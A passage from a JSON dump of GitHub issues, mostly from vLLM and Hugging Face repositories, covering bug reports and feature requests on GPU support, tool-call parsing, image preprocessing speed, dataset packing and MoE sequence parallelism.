MLA](https://github.com/deepseek-ai/FlashMLA?tab=readme-ov-file#amd-instinct).\n\nIs it possible to enable `vllm.vllm_flash_attn._vllm_fa2_C` and more modules for AMD GPUs?\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29263", "state": "closed", "labels": [ "feature request", "rocm" ], "created_at": "2025-11-23T11:28:47Z", "updated_at": "2025-12-05T01:54:08Z", "comments": 4, "user": "Inokinoki" }, { "repo": "vllm-project/vllm", "number": 29245, "title": "[Usage]: \u542f\u52a8 qwen3 vl \u8d85\u7ea7\u8d85\u7ea7\u8d85\u7ea7\u6162\uff0csglang \u542f\u52a8\u5f88\u5feb\uff0c\u53ef\u80fd\u7684\u539f\u56e0\u662f\u4ec0\u4e48\uff1f", "body": "### Your current environment\n\n\u8fde\u6267\u884c python collect_env.py \u90fd\u5f88\u6162\uff0c\u73af\u5883\u662f\u76f4\u63a5 uv \u5b89\u88c5\u7684\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.2 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : version 4.1.2\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.3 (main, Jun 18 2025, 17:59:45) [GCC 13.3.0] (64-bit runtime)\nPython platform : Linux-5.10.134-19.100.al8.x86_64-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.9.86\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : \nGPU 0: NVIDIA L20Y\nGPU 1: NVIDIA L20Y\nGPU 2: NVIDIA L20Y\nGPU 3: NVIDIA L20Y\nGPU 4: NVIDIA L20Y\nGPU 5: NVIDIA L20Y\nGPU 6: NVIDIA L20Y\nGPU 7: NVIDIA L20Y\n\nNvidia driver version : 570.148.08\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_adv.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_precompiled.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_runtime_compiled.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_graph.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_heuristic.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_ops.so.9.10.2\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 46 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 192\nOn-line CPU(s) list: 0-191\nVendor ID: GenuineIntel\nModel name: Intel(R) Xeon(R) Platinum 8468V\nCPU family: 6\nModel: 143\nThread(s) per core: 2\nCore(s) per socket: 48\nSocket(s): 2\nStepping: 8\nCPU(s) scaling MHz: 70%\nCPU max MHz: 3800.0000\nCPU min MHz: 800.0000\nBogoMIPS: 4800.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 invpcid_single intel_ppin cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow vnmi flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts hwp hwp_act_window hwp_epp hwp_pkg_req hfi avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm uintr md_clear serialize tsxldtrk pconfig arch_lbr amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities\nVirtualization: VT-x\nL1d cache: 4.5 MiB (96 instances)\nL1i cache: 3 MiB (96 instances)\nL2 cache: 192 MiB (96 instances)\nL3 cache: 195 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-47,96-143\nNUMA node1 CPU(s): 48-95,144-191\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mitigation; ", "url": "https://github.com/vllm-project/vllm/issues/29245", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-22T20:41:27Z", "updated_at": "2025-12-11T11:23:54Z", "comments": 3, "user": "hucorz" }, { "repo": "huggingface/candle", "number": 3208, "title": "`cudarc` dynamic loading support", "body": "Currently, `candle` uses `cudarc` with the `dynamic-linking` feature, which requires the executable to find the DLLs or SOs at startup. However, it would be more convenient if `candle` also supported the `dynamic-loading` feature from `cudarc` to load DLLs or SOs at runtime.\nIs it possible for `candle` to support it?", "url": "https://github.com/huggingface/candle/issues/3208", "state": "open", "labels": [], "created_at": "2025-11-22T18:18:25Z", "updated_at": "2025-11-25T09:00:27Z", "comments": 7, "user": "mayocream" }, { "repo": "huggingface/transformers", "number": 42331, "title": "SAM3 does not support custom inference resolutions", "body": "### System Info\n\nNote: I am running the latest git version, sys Info should not be relevant to the issue\n$ transformers env \nTraceback (most recent call last):\n File \"/home/master-andreas/panopticon/test_env/bin/transformers\", line 3, in \n from transformers.cli.transformers import main\n File \"/home/master-andreas/panopticon/test_env/lib/python3.12/site-packages/transformers/cli/transformers.py\", line 23, in \n from transformers.cli.serve import Serve\n File \"/home/master-andreas/panopticon/test_env/lib/python3.12/site-packages/transformers/cli/serve.py\", line 351, in \n class Serve:\n File \"/home/master-andreas/panopticon/test_env/lib/python3.12/site-packages/transformers/cli/serve.py\", line 658, in Serve\n ) -> ChatCompletionChunk:\n ^^^^^^^^^^^^^^^^^^^\nNameError: name 'ChatCompletionChunk' is not defined\n\n### Who can help?\n\n@yonigozlan\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [x] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n```py\n\"\"\"\nTest script for SAM3 text prompting only.\nThis script demonstrates how to use SAM3 for text-based segmentation on images.\n\"\"\"\n\nimport torch\nfrom PIL import Image\nimport requests\nfrom transformers import Sam3Processor, Sam3Model\nimport os\n\n\nINFERENCE_RESOLUTION = (1008, 1008) # If run with anything else other than 1008 it fails\n# INFERENCE_RESOLUTION = (1400, 1400)\n\n\ndef test_sam3_text_prompting():\n \"\"\"Test SAM3 with text prompting on a sample image.\"\"\"\n\n # Set device\n device = \"cpu\"\n print(f\"Using device: {device}\")\n\n # Load model and processor\n print(\"Loading SAM3 model and processor...\")\n model = Sam3Model.from_pretrained(\"facebook/sam3\").to(device)\n processor = Sam3Processor.from_pretrained(\"facebook/sam3\")\n\n # Load a sample image\n print(\"Loading sample image...\")\n image_url = \"http://images.cocodataset.org/val2017/000000077595.jpg\"\n image = Image.open(requests.get(image_url, stream=True).raw).convert(\"RGB\")\n\n # Define text prompts to test\n text_prompts = [\"cat\", \"ear\", \"eye\"]\n\n for text_prompt in text_prompts:\n print(f\"\\nTesting text prompt: '{text_prompt}'\")\n\n # Prepare inputs\n inputs = processor(images=image, text=text_prompt, size=INFERENCE_RESOLUTION, return_tensors=\"pt\").to(device)\n\n # Run inference\n with torch.no_grad():\n outputs = model(**inputs)\n\n # Post-process results\n results = processor.post_process_instance_segmentation(\n outputs,\n threshold=0.5,\n mask_threshold=0.5,\n target_sizes=inputs.get(\"original_sizes\").tolist()\n )[0]\n\n # Display results\n num_objects = len(results['masks'])\n print(f\"Found {num_objects} objects matching '{text_prompt}'\")\n\n if num_objects > 0:\n # Show scores for first few objects\n scores = results['scores']\n print(f\"Confidence scores: {scores[:min(3, len(scores))].tolist()}\")\n\n # Show bounding boxes for first object\n if 'boxes' in results and len(results['boxes']) > 0:\n box = results['boxes'][0]\n print(f\"First object bounding box (xyxy): {box.tolist()}\")\n\n\nif __name__ == \"__main__\":\n print(\"SAM3 Text Prompting Test Script\")\n print(\"=\" * 40)\n\n try:\n test_sam3_text_prompting()\n print(\"\\n\u2713 All tests completed successfully!\")\n\n except Exception as e:\n print(f\"\\n\u2717 Test failed with error: {e}\")\n raise\n\n```\n\nOutput when INFERENCE_RESOLUTION=[1400, 1400]:\n```sh\n$ py test_sam3_text.py\nSAM3 Text Prompting Test Script\n========================================\nUsing device: cpu\nLoading SAM3 model and processor...\nLoading weights: 100%|\u2588| 1468/1468 [00:00<00:00, 2709.52it/s, Materializing param=vision_encoder.neck.fpn\nLoading sample image...\n\nTesting text prompt: 'cat'\n\n\u2717 Test failed with error: The size of tensor a (10000) must match the size of tensor b (5184) at non-singleton dimension 2\nTraceback (most recent call last):\n File \"/home/master-andreas/panopticon/test_sam3_text.py\", line 124, in \n test_sam3_text_prompting()\n File \"/home/master-andreas/panopticon/test_sam3_text.py\", line 48, in test_sam3_text_prompting\n outputs = model(**inputs)\n ^^^^^^^^^^^^^^^\n File \"/home/master-andreas/panopticon/test_env/lib/python3.12/site-packages/torch/nn/modules/module.py\", line 1775, in _wrapped_call_impl\n return self._call_impl(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/master-andreas/panopticon/test_env/lib/python3.12/site-packages/torch/nn/modules/module.py\", line 1786, in _call_impl\n return forward_call(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/master-andreas/panopticon/test_env/lib/python3.12/site-packages/transformers/utils/generic.py\", line 938, in wrapper\n ", "url": "https://github.com/huggingface/transformers/issues/42331", "state": "closed", "labels": [ "bug" ], "created_at": "2025-11-21T22:17:08Z", "updated_at": "2025-12-10T22:46:39Z", "comments": 3, "user": "Kallinteris-Andreas" }, { "repo": "huggingface/lerobot", "number": 2500, "title": "question about the gr00t policy", "body": "hi,\n\nI see here https://huggingface.co/docs/lerobot/en/groot that gr00t is intergrated into lerobot.\n\nis it in sync with the original repo: https://github.com/NVIDIA/Isaac-GR00T ?\n\nI see in original repo that the dataset used to fine-tune, is a bit different from the original lerobot format, like libero dataset (https://huggingface.co/datasets/physical-intelligence/libero) used in pi model ,\ntherefore i wonder what dataset format should be used here in lerbot policy training ?\n\nany example dataset that is passed to `--dataset.repo_id=$DATASET_ID` ?\n\nis it a post-processed dataset ?", "url": "https://github.com/huggingface/lerobot/issues/2500", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-11-21T21:45:19Z", "updated_at": "2025-12-03T14:03:34Z", "user": "yanan1116" }, { "repo": "vllm-project/vllm", "number": 29192, "title": "Tool Calling Parsers Fail to Populate tool_calls Array for Qwen2.5-Coder Models", "body": "# Tool Calling Parsers Fail to Populate `tool_calls` Array for Qwen2.5-Coder Models\n\n## Environment\n- **vLLM Version**: v0.11.2.dev115+g56669c1f2 (Blackwell build)\n- **Model**: Qwen/Qwen2.5-Coder-14B-Instruct-AWQ\n- **Quantization**: AWQ\n- **Python Version**: 3.x (Docker container)\n- **GPU**: NVIDIA GeForce RTX 5080 (16GB, Blackwell/sm_120)\n- **Platform**: WSL2, Linux 6.6.87.2-microsoft-standard-WSL2\n\n## Description\nWhen using tool calling with Qwen2.5-Coder models, the model correctly generates tool calls in `` XML format, but both `qwen3_xml` and `qwen3_coder` parsers fail to extract these tool calls into the `tool_calls` array in the API response. The tool call information remains in the `content` field but the `tool_calls` array stays empty.\n\n## Steps to Reproduce\n\n1. Start vLLM with Qwen2.5-Coder and tool calling parser:\n```bash\npython -m vllm.entrypoints.openai.api_server \\\n --model Qwen/Qwen2.5-Coder-14B-Instruct-AWQ \\\n --quantization awq \\\n --enable-auto-tool-choice \\\n --tool-call-parser qwen3_xml # or qwen3_coder\n```\n\n2. Send a tool calling request:\n```bash\ncurl -s http://localhost:8002/v1/chat/completions \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"model\": \"qwen2.5-coder-14b-awq\",\n \"messages\": [{\"role\": \"user\", \"content\": \"What is the weather in San Francisco?\"}],\n \"tools\": [\n {\n \"type\": \"function\",\n \"function\": {\n \"name\": \"get_weather\",\n \"description\": \"Get the current weather for a location\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"location\": {\n \"type\": \"string\",\n \"description\": \"The city and state, e.g. San Francisco, CA\"\n }\n },\n \"required\": [\"location\"]\n }\n }\n }\n ],\n \"tool_choice\": \"auto\"\n }'\n```\n\n## Actual Output\n```json\n{\n \"id\": \"chatcmpl-xxx\",\n \"object\": \"chat.completion\",\n \"model\": \"qwen2.5-coder-14b-awq\",\n \"choices\": [\n {\n \"message\": {\n \"role\": \"assistant\",\n \"content\": \"\\n{\\n \\\"name\\\": \\\"get_weather\\\",\\n \\\"arguments\\\": {\\n \\\"location\\\": \\\"San Francisco, CA\\\"\\n }\\n}\\n\",\n \"tool_calls\": []\n }\n }\n ]\n}\n```\n\n## Expected Output\n```json\n{\n \"id\": \"chatcmpl-xxx\",\n \"object\": \"chat.completion\",\n \"model\": \"qwen2.5-coder-14b-awq\",\n \"choices\": [\n {\n \"message\": {\n \"role\": \"assistant\",\n \"content\": \"\",\n \"tool_calls\": [\n {\n \"type\": \"function\",\n \"id\": \"call_0\",\n \"function\": {\n \"name\": \"get_weather\",\n \"arguments\": \"{\\\"location\\\": \\\"San Francisco, CA\\\"}\"\n }\n }\n ]\n }\n }\n ]\n}\n```\n\n## Analysis\n\n### Model Output (Correct)\nThe model correctly generates tool calls in the expected `` XML format:\n```xml\n\n{\n \"name\": \"get_weather\",\n \"arguments\": {\n \"location\": \"San Francisco, CA\"\n }\n}\n\n```\n\n### Parser Behavior (Incorrect)\nBoth recommended parsers fail to extract tool calls:\n- **hermes parser**: Expects `` tags, doesn't match `` tags\n- **qwen3_xml parser**: Designed for `` tags but doesn't populate `tool_calls` array\n- **qwen3_coder parser**: Also designed for Qwen but fails to populate array\n\n### Root Cause\nThe parsers appear to load correctly (visible in logs as `'tool_call_parser': 'qwen3_xml'`) but the extraction logic fails to populate the OpenAI-compatible `tool_calls` array structure.\n\n## Workaround\nManual extraction from the `content` field:\n\n```python\nimport re\nimport json\n\ndef extract_tool_calls(response):\n \"\"\"Extract tool calls from Qwen2.5-Coder tags\"\"\"\n content = response['choices'][0]['message']['content']\n pattern = r'\\s*({.*?})\\s*'\n match = re.search(pattern, content, re.DOTALL)\n\n if match:\n tool_data = json.loads(match.group(1))\n return [{\n \"type\": \"function\",\n \"function\": {\n \"name\": tool_data[\"name\"],\n \"arguments\": json.dumps(tool_data[\"arguments\"])\n }\n }]\n return []\n```\n\n## Additional Context\n\n### Multi-AI Consultation Results\nConsulted with multiple AI models for parser recommendation:\n- **Qwen3 Coder (480B)**: Recommended `qwen3_xml` parser\n- **DeepSeek V3.1**: Ranked `qwen3_xml` (90% confidence), `qwen3_coder` (80% confidence)\n- **Claude Sonnet 4.5**: Confirmed tag mismatch between Hermes and Qwen formats\n\nAll models agreed that the parser selection is correct, suggesting the issue is in the parser implementation rather than configuration.\n\n### vLLM Configuration\n```python\n{\n 'tool_call_parser': 'qwen3_xml', # Confirmed in logs\n 'enable_auto_tool_choice': True,\n 'model': 'Qwen/Qwen2.5-Coder-14B-Instruct-AWQ',\n 'quantization': 'awq',\n 'max_model_len': 8192\n}\n```\n\n## Impact\n- **Severity**: High - Breaks OpenAI API compatibility for tool calling\n- **Affected Models**: Likely all Qwen2.5-Coder variants\n-", "url": "https://github.com/vllm-project/vllm/issues/29192", "state": "open", "labels": [], "created_at": "2025-11-21T18:31:19Z", "updated_at": "2025-11-21T18:31:19Z", "comments": 0, "user": "Platano78" }, { "repo": "vllm-project/vllm", "number": 29180, "title": "[Bug]: Recorded `EngineCoreEventType.QUEUED` time is off", "body": "### Your current environment\n\n
\n
\n\n### \ud83d\udc1b Describe the bug\n\nWhen running benchmarking with the CLI:\n\n- on one side the serving point `vllm serve ...`\n- on the other side the benchmarking client : `vllm bench serve...`\n(note that the two are running on the same machine, there is no networking delay)\n\nI noticed that the `EngineCoreEventType.QUEUED` event recorder on the server side didn't match the time of posting the request. In my understanding these two should events should be approximately equivalent. These values aren't off by a few milliseconds, but here the mismatch can be pretty big, up to a few seconds. \n\nI think the reason might be because adding [request to the scheduler](https://github.com/vllm-project/vllm/blob/fcb1d570bb8f95f5b7ded716a52fec902c535f0e/vllm/v1/core/sched/scheduler.py#L1166) cannot be done when the engine is running a decoding or a prefill, see the [`_process_input_queue` function](https://github.com/vllm-project/vllm/blob/fcb1d570bb8f95f5b7ded716a52fec902c535f0e/vllm/v1/engine/core.py#L801), where `add_request()` ultimately gets called. This can introduce delays before the queued event gets recorded, having \"floating\" requests that are not tracked in the logs.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29180", "state": "closed", "labels": [ "bug" ], "created_at": "2025-11-21T12:58:36Z", "updated_at": "2025-11-30T20:56:44Z", "comments": 4, "user": "sducouedic" }, { "repo": "vllm-project/vllm", "number": 29177, "title": "[Usage]: Vllm + Intervl model local infra Image preprocessing / request adding becomes bottleneck even with more CPU cores \u2014 how to accelerate?", "body": "### Your current environment\n\nvllm 0.11.0\n\n\n### How would you like to use vllm\n\n### current phenomenon\nWhen doing **batched image classification** (64 images per batch) with InternVL3_5-1B, the bottleneck is clearly in the **\"Adding requests\"** phase (image preprocessing). \nEven after increasing CPU cores and setting `OMP_NUM_THREADS=16`, the preprocessing speed stays around **50 it/s**, while the actual generation phase is extremely fast (>1500 prompts/s).\n\n```text\nAdding requests: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 64/64 [00:01<00:00, 52.67it/s] \u2190 bottleneck\nProcessed prompts: 100%|\u2588| 64/64 [00:00<00:00, 1515.23it/s, est. speed input: 812805.23 tok/s]\n```\nThis means ~95% of the total latency is spent on CPU-side image preprocessing, \uff08I have disabled dynamic resolution\uff09\n\n\n### Minimal Reproducible Example\n```python\nimport os\nfrom PIL import Image\nfrom vllm import LLM, SamplingParams\nfrom transformers import AutoTokenizer\n\nmodel_path = \"/data/code/haobang.geng/models/InternVL3_5-1B\"\ntokenizer = AutoTokenizer.from_pretrained(model_path, trust_remote_code=True)\n\nllm = LLM(\n model=model_path,\n dtype=\"bfloat16\",\n max_model_len=4096,\n gpu_memory_utilization=0.95,\n limit_mm_per_prompt={\"image\": 1},\n trust_remote_code=True,\n enforce_eager=False,\n)\n\nprompt = \"\\nYou are an image classifier. Output only one word: safe or nsfw.\"\nsampling_params = SamplingParams(temperature=0.0, max_tokens=8)\n\nbatch_inputs = []\nfor i in range(64):\n img = Image.open(f\"/path/to/images/{i}.jpg\").convert(\"RGB\")\n batch_inputs.append({\n \"prompt\": prompt,\n \"multi_modal_data\": {\"image\": img},\n })\n\noutputs = llm.generate(batch_inputs, sampling_params=sampling_params, use_tqdm=True)\n```\n\n### Expected behavior\nFor pure-text batches, Adding requests is >2000 it/s such as qwen3vl.\nAttempted solutions (all ineffective)\n\n### my attempt to speed up\nIncrease CPU cores / set OMP_NUM_THREADS=16 \u2192 no speedup\nmm_processor_kwargs={\"max_dynamic_patch\": 1, ...} \u2192 seems no speedup\nPre-resize images to 384\u00d7384 \u2192 helps a little (~55 it/s) but still far from ideal\n\n\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.\n\n\n\nThank you for the great work on vLLM! Looking forward to a simple way to slove it", "url": "https://github.com/vllm-project/vllm/issues/29177", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-21T10:56:29Z", "updated_at": "2025-12-01T14:08:22Z", "comments": 3, "user": "Passenger12138" }, { "repo": "huggingface/trl", "number": 4554, "title": "Better packing of data with best-fit decrease strategy", "body": "Hello,\n\nWhen using packing with the bfd strategy, it looks like too much truncation is done when the seq_length is smaller than the average length of the sequences we want to pack.\n\nFor example : \n```python\nfrom datasets import Dataset\nfrom trl import pack_dataset\n\nexamples = {\n \"input_ids\": [[1, 2, 3, 4], [5, 6], [7, 8, 9], [10]],\n \"attention_mask\": [[1, 1, 1, 1], [1, 0], [1, 0, 0], [1]],\n}\ndataset = Dataset.from_dict(examples)\n\npacked_dataset = pack_dataset(dataset, seq_length=3, strategy=\"bfd\")\nprint(packed_dataset )\n```\n\nresults in:\n```python\n{'input_ids': [[1, 2, 3], [7, 8, 9], [5, 6, 10]],\n 'attention_mask': [[1, 1, 1], [1, 0, 0], [1, 0, 1]],\n 'seq_lengths': [[3], [3], [2, 1]]}\n```\nSo the token '4' is missing from the training tokens.\n\n\nIn a extreme case:\n```python\nexamples_2 = {\n \"input_ids\": [[0, 0], [1, 2, 3, 4], [5, 6, 7, 8, 9], [10]],\n \"attention_mask\": [[1, 1], [1, 1, 1, 1], [1, 1, 1, 1, 1], [1]],\n}\ndataset_2 = Dataset.from_dict(examples_2)\nprint(pack_dataset(dataset_2, seq_length=1, strategy=\"bfd\")[:])\n```\nresults in:\n```python\n{'input_ids': [[0], [1], [5], [10]],\n 'attention_mask': [[1], [1], [1], [1]],\n 'seq_lengths': [[1], [1], [1], [1]]}\n```\n\nSo here we are basically applying truncation to every sequence instead of having twelve sequences of one token.\n\n\nIf we put ourself in a more usefull setting, when I was finetunning on some very long sequences with a seq_lenfth of 4096, the majority of the tokens was discarded y the bfd packing. On my dataset, the bfd method kept only 0.2% of the total training tokens.\n\nIs the behavior normal ?\nI would find it useful to add an option to still have tokens that are deleted in other sequences, even if this is less than ideal. It would be a good compromise between the current versions of bfd and wrapped.", "url": "https://github.com/huggingface/trl/issues/4554", "state": "closed", "labels": [ "\u2728 enhancement", "\u2753 question" ], "created_at": "2025-11-21T07:53:55Z", "updated_at": "2025-12-16T20:37:02Z", "comments": 3, "user": "ntnq4" }, { "repo": "vllm-project/vllm", "number": 29148, "title": "[Usage]: Deployment of the embedding models", "body": "### Your current environment\n\n```text\n============================== \n System Info \n============================== \nOS : Ubuntu 22.04.5 LTS (x86_64) \nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0 \nClang version : Could not collect \nCMake version : version 3.22.1\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.10.16 (main, Dec 11 2024, 16:24:50) [GCC 11.2.0] (64-bit runtime)\nPython platform : Linux-5.15.0-161-generic-x86_64-with-glibc2.35\n\n============================== \n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.61\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : \nGPU 0: NVIDIA GeForce RTX 5090\nGPU 1: NVIDIA GeForce RTX 5090\nGPU 2: NVIDIA GeForce RTX 5090\nGPU 3: NVIDIA GeForce RTX 5090\nGPU 4: NVIDIA GeForce RTX 5090\nGPU 5: NVIDIA GeForce RTX 5090\nGPU 6: NVIDIA GeForce RTX 5090\nGPU 7: NVIDIA GeForce RTX 5090\n\nNvidia driver version : 570.172.08\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.9.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv.so.9.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn.so.9.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_precompiled.so.9.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_runtime_compiled.so.9.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_graph.so.9.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_heuristic.so.9.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops.so.9.7.0\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n```\n\n\n### How would you like to use vllm\n\nWhen deploying the embedding model, I found that the actual GPU memory usage included not only the model itself but also kv_cache. Is this a reasonable phenomenon? In version v0.9.0, the GPU memory usage was only for the model itself.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29148", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-21T03:57:59Z", "updated_at": "2025-11-21T06:17:18Z", "comments": 3, "user": "Root970103" }, { "repo": "vllm-project/vllm", "number": 29139, "title": "[Feature]: Optimize collectives in TP MoE case using torch.compile pass", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nTo avoid redundant work in MoE models in the TP case, sequence parallelism was added to the Deepseek model definition in #24134 and expanded to other models in #24982. However, to avoid performing surgery on the linear layer, the current approach performs more communication than necessary. With a torch.compile custom pass, we can rewrite the graph to remove the redundant computation.\n\n### More details\n\nBefore the SP optimization, the ops in the model were:\n```\n- o_proj:[num_tokens, ...] -> [num_tokens, ...] (incomplete results)\n- all_reduce:[num_tokens, ...] -> [num_tokens, ...]\n- router:[num_tokens, ...] -> [num_tokens, ...]\n- experts:[num_tokens, ...] -> [num_tokens, ...]\n- ...\n```\n\nWith sequence parallel enabled, this becomes:\n```\n- o_proj: [num_tokens, ...] -> [num_tokens, ...] (incomplete results)\n- all_reduce: [num_tokens, ...] -> [num_tokens, ...]\n- chunk: [num_tokens, ...] -> [num_tokens/tp, ...]\n- router: [num_tokens/tp, ...] -> [num_tokens/tp, ...]\n- experts: [num_tokens/tp, ...] -> [num_tokens/tp, ...]\n- all_gather: [num_tokens/tp, ...] -> [num_tokens, ...]\n```\n\nAdditionally, experts now properly do the dp+tp<->ep dispatch instead of just the original replicated dp<->ep dispatch.\n\nNotice that the `all_reduce` does redundant communication as each TP rank only requires partial results. With a compile pass, we can convert the `all_reduce` -> `chunk` sequence into a `reduce_scatter`:\n\n```\n- o_proj: [num_tokens, ...] -> [num_tokens, ...] (incomplete results)\n- reduce_scatter: [num_tokens, ...] -> [num_tokens/tp, ...]\n- router: [num_tokens/tp, ...] -> [num_tokens/tp, ...]\n- experts: [num_tokens/tp, ...] -> [num_tokens/tp, ...]\n- all_gather: [num_tokens/tp, ...] -> [num_tokens, ...]\n```\n\nWe should create a new `SequenceParallelismMoEPass`, controlled by a new `PassConfig.enable_sp_moe` flag (following the new naming convention in #27995) so that it can be turned on independently of regular SP. We will likely need to pad the number of tokens to a multiple of TP size, although like described in #29136, there are alternatives.\n\n### Alternatives\n\nAlternatively, the original optimization could be done as a compile pass as well, which would significantly clean up the MoE model definitions. However, that would mean that `VLLM_COMPILE` compilation mode would be required for this optimization and if compilation is disabled, the optimization would be disabled as well. Generally we accept lower performance in eager mode as compilation is on by default, but I know there was a reason this was done this way (don't remember why).\n\n### Additional context\n\nOriginal proposal comment: https://github.com/vllm-project/vllm/pull/24982#pullrequestreview-3259494618\n\ncc @tlrmchlsmth @bnellnm @robertgshaw2-redhat @alexm-redhat @zou3519 @nvpohanh @youkaichao \n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29139", "state": "open", "labels": [ "help wanted", "good first issue", "performance", "feature request", "torch.compile" ], "created_at": "2025-11-21T01:36:06Z", "updated_at": "2025-12-07T15:39:48Z", "comments": 19, "user": "ProExpertProg" }, { "repo": "vllm-project/vllm", "number": 29097, "title": "[Docs] Feedback for `/en/latest/`", "body": "### \ud83d\udcda The doc issue\n\nno\n\n### Suggest a potential alternative/fix\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29097", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-11-20T14:53:44Z", "updated_at": "2025-11-21T07:51:57Z", "comments": 2, "user": "ch950684-svg" }, { "repo": 